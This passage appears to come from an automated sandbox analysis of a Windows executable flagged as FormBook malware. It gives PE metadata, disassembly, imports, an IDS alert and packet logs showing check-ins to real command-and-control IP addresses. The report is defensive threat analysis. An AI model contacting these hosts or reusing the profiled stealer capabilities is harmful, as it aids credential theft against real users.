                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x674E4731 [Mon Dec 2 23:48:01 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007FCFC4E3778Ah
                                                      jmp 00007FCFC4E2A554h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FCFC4E2A6DAh
                                                      cmp edi, eax
                                                      jc 00007FCFC4E2AA3Eh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007FCFC4E2A6D9h
                                                      rep movsb
                                                      jmp 00007FCFC4E2A9ECh
                                                      cmp ecx, 00000080h
                                                      jc 00007FCFC4E2A8A4h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FCFC4E2A6E0h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007FCFC4E2ABB0h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007FCFC4E2A87Dh
                                                      test edi, 00000003h
                                                      jne 00007FCFC4E2A88Eh
                                                      test esi, 00000003h
                                                      jne 00007FCFC4E2A86Dh
                                                      bt edi, 02h
                                                      jnc 00007FCFC4E2A6DFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FCFC4E2A6E3h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FCFC4E2A735h
                                                      bt esi, 03h
                                                      jnc 00007FCFC4E2A788h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5fc24.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x711c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc70000x5fc240x5fe000c052a8ef5f581d1d64a6961feb0e3a8False0.9307264504563233data7.901992411652025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1270000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcf7b80x56eebdata1.0003257740644527
                                                      RT_GROUP_ICON0x1266a40x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x12671c0x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x1267300x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x1267440x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x1267580xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x1268340x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                      Imports

                                                      DLLImport
                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-03T06:54:26.889952+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.449737134.0.14.15880TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 3, 2024 06:54:07.973257065 CET4973680192.168.2.4104.21.36.62
                                                      Dec 3, 2024 06:54:08.093246937 CET8049736104.21.36.62192.168.2.4
                                                      Dec 3, 2024 06:54:08.093504906 CET4973680192.168.2.4104.21.36.62
                                                      Dec 3, 2024 06:54:08.102482080 CET4973680192.168.2.4104.21.36.62
                                                      Dec 3, 2024 06:54:08.222378016 CET8049736104.21.36.62192.168.2.4
                                                      Dec 3, 2024 06:54:09.374830961 CET8049736104.21.36.62192.168.2.4
                                                      Dec 3, 2024 06:54:09.381999969 CET8049736104.21.36.62192.168.2.4
                                                      Dec 3, 2024 06:54:09.382112026 CET4973680192.168.2.4104.21.36.62
                                                      Dec 3, 2024 06:54:09.383387089 CET4973680192.168.2.4104.21.36.62
                                                      Dec 3, 2024 06:54:09.503251076 CET8049736104.21.36.62192.168.2.4
                                                      Dec 3, 2024 06:54:25.243577957 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:25.363686085 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:25.363764048 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:25.381787062 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:25.501678944 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.889951944 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921345949 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921365023 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921381950 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921415091 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921442032 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921511889 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921569109 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921608925 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921627998 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921641111 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921653032 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921658039 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921664953 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.921670914 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921695948 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.921717882 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:26.922028065 CET8049737134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:26.922075987 CET4973780192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:27.908341885 CET4973880192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:28.028384924 CET8049738134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:28.028477907 CET4973880192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:28.040745020 CET4973880192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:28.160650015 CET8049738134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:29.545823097 CET4973880192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:29.666177034 CET8049738134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:29.666235924 CET4973880192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:30.564508915 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:30.684504986 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.684598923 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:30.698199034 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:30.818434000 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818444967 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818481922 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818490982 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818538904 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818547010 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818556070 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818588018 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:30.818595886 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.202126026 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313112020 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313134909 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313147068 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313174009 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313209057 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313381910 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313394070 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313405991 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313420057 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313420057 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313431025 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313452005 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313452005 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313479900 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313479900 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.313711882 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313724041 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.313759089 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:32.363394022 CET8049739134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:32.363451004 CET4973980192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:33.220273018 CET4974280192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:33.340464115 CET8049742134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:33.340651989 CET4974280192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:33.348176003 CET4974280192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:33.468470097 CET8049742134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:34.898689985 CET8049742134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:34.899377108 CET8049742134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:34.899435997 CET4974280192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:34.901138067 CET4974280192.168.2.4134.0.14.158
                                                      Dec 3, 2024 06:54:35.043222904 CET8049742134.0.14.158192.168.2.4
                                                      Dec 3, 2024 06:54:41.051467896 CET4975880192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:41.171389103 CET8049758103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:41.171480894 CET4975880192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:41.184705019 CET4975880192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:41.304862976 CET8049758103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:42.445481062 CET8049758103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:42.445497036 CET8049758103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:42.445590973 CET4975880192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:42.686387062 CET4975880192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:43.705975056 CET4976480192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:43.826019049 CET8049764103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:43.826200962 CET4976480192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:43.840186119 CET4976480192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:43.960129023 CET8049764103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:45.113013983 CET8049764103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:45.113308907 CET8049764103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:45.113552094 CET4976480192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:45.342789888 CET4976480192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:46.360934019 CET4977080192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:46.480910063 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.481102943 CET4977080192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:46.497889996 CET4977080192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:46.617996931 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618014097 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618124008 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618182898 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618272066 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618280888 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618318081 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618370056 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:46.618402958 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:47.838072062 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:47.838242054 CET8049770103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:47.838315010 CET4977080192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:47.998935938 CET4977080192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:49.017743111 CET4977680192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:49.137685061 CET8049776103.224.182.242192.168.2.4
                                                      Dec 3, 2024 06:54:49.137893915 CET4977680192.168.2.4103.224.182.242
                                                      Dec 3, 2024 06:54:49.146585941 CET4977680192.168.2.4103.224.182.242
